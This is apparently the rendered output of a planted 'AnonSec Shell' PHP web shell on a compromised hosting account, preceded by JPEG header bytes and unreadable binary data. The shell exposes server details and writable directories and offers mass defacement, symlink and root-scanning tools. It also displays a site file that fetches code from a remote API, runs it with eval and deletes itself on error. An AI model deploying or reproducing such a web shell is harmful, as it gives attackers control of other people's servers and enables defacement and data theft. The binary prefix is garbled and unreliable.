JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 46.28.45.50  /  Your IP : 216.73.217.98   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux in-mum-web1275.main-hosting.eu 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User : u215115003 ( 215115003)
PHP Version : 8.1.34
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u215115003/domains/prideindustries.net.in/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/u215115003/domains/prideindustries.net.in/public_html/monarx-analyzer.php
<?php
error_reporting(0);
ignore_user_abort(true);
set_time_limit(60000);
ini_set("max_execution_time", 60000);

header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
header("Access-Control-Allow-Headers: *");

final class MonarxSecuritySiteAnalyzer
{
    private $instructions;

    public function __construct()
    {
        $req_body = $this->getRequestBody();

        if (is_array($req_body)) {
            $req_body["file_hash"] = $this->getFileHash();
        }

        $endpoint = $this->getEndpoint($req_body);
        $this->instructions = $this->httpPost($endpoint, $req_body);
    }

    private function getEndpoint($req_body)
    {
        $subdomain = "";
        $subdomains = [
            "mx-prod" => "",
            "mx-stage" => "stage",
            "mx-dev" => "dev",
        ];

        if (
            isset($req_body["env"]) &&
            array_key_exists($req_body["env"], $subdomains)
        ) {
            $subdomain = $subdomains[$req_body["env"]];
        }

        if (strlen($subdomain) > 0) {
            $subdomain = ".$subdomain";
        }

        return "https://api$subdomain.monarx.com/v1/intelligence/site-analysis/register";
    }

    private function getRequestBody()
    {
        $input = file_get_contents("php://input");

        if ($input === false) {
            $this->handleError("Failed to read input");
        }

        $decoded = json_decode($input, true);
        if (json_last_error() !== JSON_ERROR_NONE) {
            $this->handleError("Logging off. Goodbye!", true);
        }

        return $decoded;
    }

    private function getFileHash()
    {
        $file_path = __FILE__;
        $file_contents = file_get_contents($file_path);

        if ($file_contents === false) {
            $this->handleError("Failed to load checksum");
        }

        return hash("sha256", $file_contents);
    }

    private function httpPost($url, $data)
    {
        $payload = json_encode($data);

        if ($payload === false) {
            $this->handleError("Failed to encode payload");
        }

        $ch = curl_init($url);

        if ($ch === false) {
            $this->handleError("Failed to initialize request");
        }

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLINFO_HEADER_OUT, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            "Content-Type: application/json",
        ]);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
        curl_setopt($ch, CURLOPT_USERAGENT, "Monarx Security");

        $result = curl_exec($ch);
        if ($result === false) {
            curl_close($ch);
            $this->handleError("Failed to connect", true);
        }

        curl_close($ch);
        return $result;
    }

    public function run()
    {
        if (!empty($this->instructions)) {
            if ($this->validateInstructions($this->instructions)) {
                eval($this->instructions);
            } else {
                $this->handleError("Invalid instructions received", true);
            }
        } else {
            $this->handleError("No instructions received", true);
        }
    }

    private function validateInstructions($instructions)
    {
        return is_string($instructions);
    }

    private function handleError($message, $deleteSelf = false)
    {
        echo json_encode(array("error" => $message, "success" => false));

        if ($deleteSelf) {
            @unlink(__FILE__);
        }

        exit();
    }
}

try {
    $mnx = new MonarxSecuritySiteAnalyzer();
    $mnx->run();
} catch (Exception $e) {
    $error_message = "Unknown error occurred";
    echo json_encode(array("error" => $error_message, "success" => false));
    @unlink(__FILE__);
}
?>

Anon7 - 2022
AnonSec Team